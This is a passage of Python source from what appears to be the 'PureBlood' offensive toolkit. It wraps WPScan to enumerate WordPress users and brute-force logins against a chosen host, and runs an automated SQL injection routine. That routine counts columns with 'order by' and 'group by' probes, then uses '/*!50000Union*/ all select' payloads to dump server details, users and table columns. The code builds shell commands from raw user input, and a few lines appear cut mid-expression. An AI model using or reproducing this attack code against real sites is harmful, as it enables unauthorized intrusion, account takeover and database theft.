or git for windows first!{0}'.format(reset, red, blue, yellow)) 469 | print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html') 470 | time.sleep(2) 471 | print ('') 472 | web_application_attack() 473 | else: 474 | pass 475 | wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 476 | if wp_scan != 0: 477 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 478 | print (""" 479 | Linux / MAC OS: 480 | https://wpscan.org 481 | Android: 482 | Termux / GNURoot 483 | Windows: 484 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 485 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 486 | 
Kali Linux: 487 | sudo apt-get install wpscan""") 488 | time.sleep(2) 489 | print ('') 490 | web_application_attack() 491 | else: 492 | pass 493 | else: 494 | wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 495 | if wp_scan != 0: 496 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 497 | print (""" 498 | Linux / MAC OS: 499 | https://wpscan.org 500 | Android: 501 | Termux / GNURoot 502 | Windows: 503 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 504 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 505 | Kali Linux: 506 | sudo apt-get install wpscan""") 507 | time.sleep(2) 508 | print ('') 509 | web_application_attack() 510 | else: 511 | pass 512 | if wp_scan == 0: 513 | pass 514 | elif wp_scan == 1: 515 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow)) 516 | print (""" 517 | Linux / MAC OS: 518 | https://wpscan.org 519 | Android: 520 | Termux / GNURoot 521 | Windows: 522 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 523 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 524 | Kali Linux: 525 | sudo apt-get install wpscan""") 526 | time.sleep(2) 527 | print ('') 528 | web_application_attack() 529 | if platform.system() == 'Windows': 530 | print ('[#] - Updating WPScan:') 531 | subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True) 532 | print ('\n[#] - Running WPScan:') 533 | if sys.version_info[0] == 3: 534 | wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red))) 535 | elif sys.version_info[0] == 2: 536 | wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 
1-20]{1})> {2}'.format(green, blue, cyan, red))) 537 | try: 538 | subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True) 539 | except Exception as e: 540 | print ('[!] - Error: {0}'.format(e)) 541 | time.sleep(2) 542 | print ('') 543 | web_application_attack() 544 | else: 545 | print ('[#] - Updating WPScan:') 546 | subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True) 547 | print ('\n[#] - Running WPScan:') 548 | if sys.version_info[0] == 3: 549 | wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red))) 550 | elif sys.version_info[0] == 2: 551 | wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red))) 552 | try: 553 | subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True) 554 | except Exception as e: 555 | print ('[!] 
- Error: {0}'.format(e)) 556 | time.sleep(2) 557 | print ('') 558 | web_application_attack() 559 | 560 | def wp_scan_bruteforce(self, url): 561 | wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 562 | if wp_scan_test_ruby_command == 0: 563 | pass 564 | elif wp_scan_test_ruby_command == 1: 565 | print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow)) 566 | print ('Ruby Installer: https://rubyinstaller.org/') 567 | time.sleep(2) 568 | print ('') 569 | web_application_attack() 570 | if platform.system() == 'Windows': 571 | if not os.path.exists('external/wpscan-master'): 572 | wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 573 | if wp_scan_download_curl == 0: 574 | wp_scan_unzip = zipfile.ZipFile('master.zip', 'r') 575 | wp_scan_unzip.extractall('external/') 576 | wp_scan_unzip.close() 577 | os.remove('master.zip') 578 | elif wp_scan_download_curl == 1: 579 | if os.path.exists('external/wpscan'): 580 | os.rename('external/wpscan', 'external/wpscan-master') 581 | else: 582 | wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 583 | if wp_scan_download_git == 0: 584 | os.rename('external/wpscan', 'external/wpscan-master') 585 | elif wp_scan_download_git == 1: 586 | print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow)) 587 | print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html') 588 | time.sleep(2) 589 | print ('') 590 | web_application_attack() 591 | else: 592 | pass 593 | wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, 
stdout=FNULL, stderr=subprocess.STDOUT) 594 | if wp_scan != 0: 595 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 596 | print (""" 597 | Linux / MAC OS: 598 | https://wpscan.org 599 | Android: 600 | Termux / GNURoot 601 | Windows: 602 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 603 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 604 | Kali Linux: 605 | sudo apt-get install wpscan""") 606 | time.sleep(2) 607 | print ('') 608 | web_application_attack() 609 | else: 610 | pass 611 | else: 612 | wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 613 | if wp_scan != 0: 614 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 615 | print (""" 616 | Linux / MAC OS: 617 | https://wpscan.org 618 | Android: 619 | Termux / GNURoot 620 | Windows: 621 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 622 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 623 | Kali Linux: 624 | sudo apt-get install wpscan""") 625 | time.sleep(2) 626 | print ('') 627 | web_application_attack() 628 | else: 629 | pass 630 | if wp_scan == 0: 631 | pass 632 | elif wp_scan == 1: 633 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow)) 634 | print (""" 635 | Linux / MAC OS: 636 | https://wpscan.org 637 | Android: 638 | Termux / GNURoot 639 | Windows: 640 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 641 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 642 | Kali Linux: 643 | sudo apt-get install wpscan""") 644 | time.sleep(2) 645 | print ('') 646 | web_application_attack() 647 | if platform.system() == 'Windows': 648 | print ('[#] - Updating WPScan:') 649 | subprocess.call('ruby 
external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True) 650 | print ('\n[#] - Running WPScan:') 651 | if sys.version_info[0] == 3: 652 | wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 653 | wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 654 | elif sys.version_info[0] == 2: 655 | wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 656 | wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 657 | try: 658 | subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True) 659 | except Exception as e: 660 | print ('[!] 
- Error: {0}'.format(e)) 661 | time.sleep(2) 662 | print ('') 663 | web_application_attack() 664 | else: 665 | print ('[#] - Updating WPScan:') 666 | subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True) 667 | print ('\n[#] - Running WPScan:') 668 | if sys.version_info[0] == 3: 669 | wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 670 | wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 671 | elif sys.version_info[0] == 2: 672 | wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 673 | wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 674 | try: 675 | subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True) 676 | except Exception as e: 677 | print ('[!] 
- Error: {0}'.format(e)) 678 | time.sleep(2) 679 | print ('') 680 | web_application_attack() 681 | print (reset) 682 | print ('{0}='.format(red) * int(sizex)) 683 | web_application_attack() 684 | 685 | def auto_sql_injection(self, url): 686 | print ('[#] - Auto SQL Injection Running on -> {0}'.format(url)) 687 | auto_sql_injection_request_origin = requests.get(url) 688 | auto_sql_injection_request_origin_html = BeautifulSoup(auto_sql_injection_request_origin.text, 'html.parser') 689 | auto_sql_injection_request_origin_html_h1 = auto_sql_injection_request_origin_html.find_all('h1') 690 | auto_sql_injection_request_origin_html_h2 = auto_sql_injection_request_origin_html.find_all('h2') 691 | auto_sql_injection_request_origin_html_h3 = auto_sql_injection_request_origin_html.find_all('h3') 692 | auto_sql_injection_request_origin_html_p = auto_sql_injection_request_origin_html.find_all('p') 693 | print ('[~] - Checking If Vulnerable') 694 | auto_sql_injection_request = requests.get('{0}\''.format(url)) 695 | auto_sql_injection_request_url = '{0}\''.format(url) 696 | auto_sql_injection_request_result = '' 697 | auto_sql_injection_request_i = '' 698 | if auto_sql_injection_request.status_code == 200: 699 | for db, errors in dbms_errors.items(): 700 | for error in errors: 701 | if re.compile(error).search(auto_sql_injection_request.text): 702 | error = re.compile(error) 703 | auto_sql_injection_request_result = 'Vulnerable1' 704 | print ('[+] - Vulnerable: Database -> ({0})'.format(db)) 705 | if auto_sql_injection_request_result == '': 706 | if auto_sql_injection_request_origin.text != auto_sql_injection_request.text: 707 | auto_sql_injection_request_result = 'Vulnerable2' 708 | print ('[+] - Vulnerable: NO Syntax Error') 709 | elif auto_sql_injection_request.status_code == 403: 710 | print ('[!] - Not Vulnerable!') 711 | elif auto_sql_injection_request.status_code == 406: 712 | print ('[!] 
- Not Vulnerable!') 713 | if auto_sql_injection_request_result == 'Vulnerable1': 714 | auto_sql_injection_request_ii = 0 715 | auto_sql_injection_request_iii = '' 716 | print ('[~] - Counting How Many Columns:') 717 | auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1')) 718 | if ' order by 1--' in auto_sql_injection_request_orderby.text or 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text: 719 | auto_sql_injection_orderby_result = 'err1' 720 | else: 721 | auto_sql_injection_orderby_result = '' 722 | if auto_sql_injection_orderby_result == 'err1': 723 | single_quote_payload = '' 724 | else: 725 | single_quote_payload = '\'' 726 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, '100')) 727 | if 'Unknown column' in auto_sql_injection_request_orderby.text and '
{0}'.format(str(i))) 737 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i))) 738 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 739 | break 740 | if auto_sql_injection_orderby_result == 'err1': 741 | if 'Unknown column' in auto_sql_injection_request_orderby.text and '
{0}'.format(str(i))) 763 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i))) 764 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 765 | break 766 | if auto_sql_injection_orderby_result == 'err1': 767 | if 'Unknown column' in auto_sql_injection_request_orderby.text and '
')) 923 | sqli_table = user_choice1 924 | user_choice = str(input('\tColumn> ')) 925 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 926 | break 927 | else: 928 | sqli_column.append(user_choice) 929 | if sys.version_info[0] == 2: 930 | if sqli_table: 931 | pass 932 | elif not sqli_table: 933 | user_choice1 = str(raw_input('Table> ')) 934 | sqli_table = user_choice1 935 | user_choice = str(raw_input('\tColumn> ')) 936 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 937 | break 938 | else: 939 | sqli_column.append(user_choice) 940 | print ('') 941 | print ('[~] Dumping Columns:') 942 | for i in sqli_column: 943 | auto_sql_injection_request_column_dump_list = [] 944 | auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table) 945 | auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',') 946 | auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('', i) 947 | auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url) 948 | auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser') 949 | auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'}) 950 | for ii in auto_sql_injection_request_column_dump_soup_pureblood: 951 | if ii.text in auto_sql_injection_request_column_dump_list: 952 | pass 953 | elif ii.text not in auto_sql_injection_request_column_dump_list: 954 | auto_sql_injection_request_column_dump_list.append(ii.text) 955 | for iii in auto_sql_injection_request_column_dump_list: 956 | print ('\t{0} -> {1}'.format(i, iii)) 957 | elif 
auto_sql_injection_request_result == 'Vulnerable2': # error_output() == False 958 | auto_sql_injection_request_ii = 0 959 | auto_sql_injection_request_iii = '' 960 | print ('[~] - Counting How Many Columns:') 961 | auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1')) 962 | auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser') 963 | if 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text: 964 | auto_sql_injection_orderby_result = 'err1' 965 | print ('YES') 966 | else: 967 | auto_sql_injection_orderby_result = '' 968 | if auto_sql_injection_orderby_result == 'err1': 969 | single_quote_payload = '' 970 | else: 971 | single_quote_payload = '\'' 972 | for i in range(50): 973 | if i == 0: 974 | i = i + 1 975 | print ('\tColumn -> {0}'.format(str(i))) 976 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i))) 977 | auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser') 978 | auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1') 979 | auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2') 980 | auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3') 981 | auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p') 982 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 983 | break 984 | if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1: 985 | auto_sql_injection_request_i = i 986 | break 987 | elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2: 988 | auto_sql_injection_request_i = i 989 | break 990 | elif 
auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3: 991 | auto_sql_injection_request_i = i 992 | break 993 | elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p: 994 | auto_sql_injection_request_i = i 995 | break 996 | if not auto_sql_injection_request_i: 997 | for i in range(50): 998 | print ('\tColumn -> {0}'.format(str(i))) 999 | auto_sql_injection_request_orderby = requests.get('{0}{1} group by {2}--+'.format(url, single_quote_payload, str(i))) 1000 | auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser') 1001 | auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1') 1002 | auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2') 1003 | auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3') 1004 | auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p') 1005 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 1006 | print ('[!] - Not Vulnerable!') 1007 | print ('') 1008 | web_application_attack() 1009 | if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1: 1010 | auto_sql_injection_request_i = i 1011 | break 1012 | elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2: 1013 | auto_sql_injection_request_i = i 1014 | break 1015 | elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3: 1016 | auto_sql_injection_request_i = i 1017 | break 1018 | elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p: 1019 | auto_sql_injection_request_i = i 1020 | break 1021 | if not auto_sql_injection_request_i: 1022 | print ('[!] 
- Not Able to Find How Many Columns!') 1023 | print ('') 1024 | web_application_attack() 1025 | print ('[+] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1))) 1026 | for i in range(auto_sql_injection_request_i): 1027 | auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1 1028 | if auto_sql_injection_request_ii == auto_sql_injection_request_i: 1029 | auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1 1030 | auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii)) 1031 | break 1032 | auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii)) 1033 | auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii)) 1034 | print ('') 1035 | print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan)) 1036 | if sys.version_info[0] == 3: 1037 | target = str(input('Target> ')) 1038 | if sys.version_info[0] == 2: 1039 | target = str(raw_input('Target> ')) 1040 | print ('') 1041 | if 'http://' in target: 1042 | url = target 1043 | hostname = target.replace('http://', '') 1044 | elif 'https://' in target: 1045 | url = target 1046 | hostname = target.replace('https://', '') 1047 | if '://' not in target: 1048 | url = 'http://' + target 1049 | hostname = target 1050 | print ('[~] - Finding Vulnerable Column:') 1051 | auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii)) 1052 | auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser') 1053 | auto_sql_injection_request_vulncolumn_nums = re.findall('\d+', str(auto_sql_injection_request_vulncolumn_soup)) 1054 | auto_sql_injection_request_vulncolumn_possible_vulncolumn = [] 1055 | 
auto_sql_injection_request_vulncolumn_column = '' 1056 | for i in auto_sql_injection_request_vulncolumn_nums: 1057 | if len(i) < 2: 1058 | auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i) 1059 | if i == 0: 1060 | pass 1061 | auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn)) 1062 | auto_sql_injection_request_vulncolumn_column = '' 1063 | for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn: 1064 | print ('\tTrying -> {0}'.format(str(i))) 1065 | auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',') 1066 | auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url) 1067 | if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text: 1068 | auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser') 1069 | auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url 1070 | auto_sql_injection_request_vulncolumn_column = i 1071 | break 1072 | if not auto_sql_injection_request_vulncolumn_column: 1073 | print ('[!] 
- Not Vulnerable!') 1074 | print ('') 1075 | web_application_attack() 1076 | print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column))) 1077 | auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',') 1078 | auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',') 1079 | auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',') 1080 | auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',') 1081 | auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',') 1082 | auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',') 1083 | auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',') 1084 | 
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',') 1085 | auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',') 1086 | auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',') 1087 | auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',') 1088 | auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',') 1089 | auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',') 1090 | auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url) 1091 | auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url) 1092 | auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url) 1093 | auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url) 1094 | auto_sql_injection_request_basedir = 
requests.get(auto_sql_injection_request_basedir_url) 1095 | auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url) 1096 | auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url) 1097 | auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url) 1098 | auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url) 1099 | auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url) 1100 | auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url) 1101 | auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url) 1102 | auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url) 1103 | sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser') 1104 | sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser') 1105 | sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser') 1106 | sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser') 1107 | sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser') 1108 | sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser') 1109 | sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser') 1110 | sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser') 1111 | sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser') 1112 | sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser') 1113 | sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser') 1114 | sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser') 
1115 | sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser') 1116 | sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1117 | sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1118 | sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1119 | sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1120 | sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1121 | sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1122 | sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1123 | sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1124 | sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1125 | sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1126 | sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1127 | sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1128 | sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1129 | print ('[+] Hostname: {0}'.format(sqli_hostname)) 1130 | print ('[+] TMP Directory: {0}'.format(sqli_tmpdir)) 1131 | print ('[+] Data Directory: {0}'.format(sqli_datadir)) 1132 | print ('[+] Database Version: {0}'.format(sqli_version)) 1133 | print ('[+] Base Directory: {0}'.format(sqli_basedir)) 1134 | print ('[+] Current User: {0}'.format(sqli_user)) 1135 | print ('[+] Current Database: {0}'.format(sqli_database)) 1136 | print ('[+] Current Schema: {0}'.format(sqli_schema)) 1137 | print ('[+] System UUID Key: 